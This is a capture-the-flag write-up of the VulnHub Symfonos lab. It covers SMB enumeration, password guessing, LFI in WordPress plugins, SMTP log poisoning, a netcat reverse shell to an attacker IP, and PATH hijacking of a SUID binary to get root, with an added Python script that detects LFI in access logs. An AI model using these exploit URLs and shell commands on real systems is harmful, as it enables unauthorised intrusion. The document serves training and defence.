CTF-Writeups/VulnHub/Symfonos.md
2021-05-20 20:24:47 +05:00

Vulnhub-Symfonos

Rustscan


```
22/tcp  open  ssh         OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
|   2048 ab:5b:45:a7:05:47:a5:04:45:ca:6f:18:bd:18:03:c2 (RSA)
|   256 a0:5f:40:0a:0a:1f:68:35:3e:f4:54:07:61:9f:c6:4a (ECDSA)
|_  256 bc:31:f5:40:bc:08:58:4b:fb:66:17:ff:84:12:ac:1d (ED25519)
25/tcp  open  smtp        Postfix smtpd
|_smtp-commands: symfonos.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8,
| ssl-cert: Subject: commonName=symfonos
| Subject Alternative Name: DNS:symfonos
| Not valid before: 2019-06-29T00:29:42
|_Not valid after:  2029-06-26T00:29:42
|_ssl-date: TLS randomness does not represent time
80/tcp  open  http        Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Site doesn't have a title (text/html).
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 4.5.16-Debian (workgroup: WORKGROUP)
MAC Address: 08:00:27:41:21:96 (Oracle VirtualBox virtual NIC)
Service Info: Hosts:  symfonos.localdomain, SYMFONOS; OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

PORT 139/445 (SMB)

I ran smbmap to see which shares I have read access to as an anonymous user

So we only have read access to the anonymous share

We can see a text file there, so let's download it using GET

This looks like a list of potential passwords we can use when brute forcing; we also have a username, zeus

Let's run enum4linux-ng to enumerate for users

We only get one user, helios

PORT 80 (HTTP)

On the web server we see this weird image

There's nothing in the source either, so I started to fuzz for files and directories using dirsearch

But I found nothing, so brute forcing is the last resort and that is what I'll be doing. We have a username, so we could try to brute force with those 3 passwords; if that fails I'll move to rockyou.txt

It failed, so let's try these 3 passwords on SMB as helios

The first password failed but the second worked, and we can access his share now

After reading todo.txt we get a hidden directory

So this is a WordPress site, but the CSS isn't loaded; we can fix it by seeing where it's grabbing the CSS file from

We need to add the domain symfonos.local to the /etc/hosts file

Now it looks better, so let's enumerate the WordPress site; for that I am going to use wpscan

We have a user admin, so we could brute force his password

I'll also run a scan to enumerate the plugins being used on the WordPress site

We can see two plugins, mail-masta and site-editor; first I am going to search mail-masta for any exploits

And it seems we found an LFI vulnerability exploit in mail-masta

Let's give it a try by reading the /etc/passwd file through the LFI

And boom, we have an LFI vulnerability here

The other plugin is also vulnerable to LFI

Now we know that port 25, which is SMTP, is open, so we could see if we could poison its log files; visiting HackTricks I found that it's possible

http://symfonos.local/h3l105/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/var/mail/helios

We can read the logs, so it's possible. I followed this article in order to do SMTP log poisoning

https://liberty-shell.com/sec/2018/05/19/poisoning/

The sender's address is just what I saw in the logs, so I put it there; the important thing to note is the subject we send, which carries the code that executes a GET parameter as a shell command. Now if we add that parameter alongside the path of the log file

http://symfonos.local/h3l105/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/var/mail/helios&pwn=id

So let's just get a shell with netcat

http://symfonos.local/h3l105/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/var/mail/helios&hello=nc 192.168.1.2 2222 -e /bin/bash
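As an added defensive example, not code from the original write-up: the detection logic below parses Apache access-log lines (constructed here to mirror the requests above) and flags LFI attempts against the site-editor ajax_path parameter, including the log-file-plus-extra-parameter pattern used in the SMTP poisoning chain. The sample log lines and the SENSITIVE_PATHS watch-list are my assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Apache combined log format; the "target" group is the request path plus query string.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# Files read through the LFI in the write-up (assumed watch-list, extend as needed).
SENSITIVE_PATHS = ("/etc/passwd", "/var/mail/", "/var/log/")

def classify_request(target):
    """Return the reasons a request looks like an LFI attempt ([] when it looks clean)."""
    reasons = []
    params = parse_qs(urlsplit(target).query, keep_blank_values=True)
    for name, values in params.items():
        for raw in values:
            value = unquote(unquote(raw))  # second pass catches double-encoded ../
            if "../" in value or "..\\" in value:
                reasons.append(f"{name}: traversal sequence")
            elif value.startswith("/"):
                reasons.append(f"{name}: absolute path")
            if any(p in value for p in SENSITIVE_PATHS):
                reasons.append(f"{name}: sensitive file {value}")
    # Log-poisoning chain: the log file in ajax_path plus a second parameter carrying a command.
    if "ajax_path" in params and len(params) > 1:
        reasons.append("extra parameters alongside ajax_path: "
                       + ", ".join(sorted(k for k in params if k != "ajax_path")))
    return reasons

def find_lfi_attempts(lines):
    """Parse access-log lines and return (ip, target, reasons) for every suspicious request."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m is None:
            continue  # not a request line we understand
        reasons = classify_request(m["target"])
        if reasons:
            hits.append((m["ip"], m["target"], reasons))
    return hits

# Constructed sample log lines modelled on the requests in this write-up.
PLUGIN = "/h3l105/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php"
SAMPLE_LOG = [
    '192.168.1.10 - - [20/May/2021:20:10:01 +0500] "GET /h3l105/ HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    f'192.168.1.2 - - [20/May/2021:20:12:45 +0500] "GET {PLUGIN}?ajax_path=/etc/passwd HTTP/1.1" 200 2540 "-" "curl/7.64.0"',
    f'192.168.1.2 - - [20/May/2021:20:14:02 +0500] "GET {PLUGIN}?ajax_path=/var/mail/helios&pwn=id HTTP/1.1" 200 890 "-" "curl/7.64.0"',
    f'192.168.1.2 - - [20/May/2021:20:15:30 +0500] "GET {PLUGIN}?ajax_path=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 2540 "-" "curl/7.64.0"',
]

if __name__ == "__main__":
    for ip, target, reasons in find_lfi_attempts(SAMPLE_LOG):
        print(ip, target, reasons)
```

Feeding the real access log in line by line (or a tail of it from a SIEM) gives a cheap first alert for the whole chain, since both the file-read and the poisoned-log execution requests pass through the same plugin endpoint.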

Now we check if we have permission to run any command with sudo, using sudo -l

No sudo : \

Let's check for any SUID binaries

We found /opt/statuscheck. Running the binary results in it making a request

Let's analyze the binary further, if strings is installed on the machine

It is available, so we can see what the binary is doing

The binary runs the command curl http://localhost without an absolute path, and a SUID binary inherits PATH from the unprivileged caller, so we can hijack the PATH variable here: create a fake curl binary that runs bash and put its directory first in PATH

However, if we run it, we won't get a root shell

I then tried to make bash SUID

It gave me an error and I was not sure why it wasn't working, so I just removed the shebang line

Ran it again

And boom, we have made bash SUID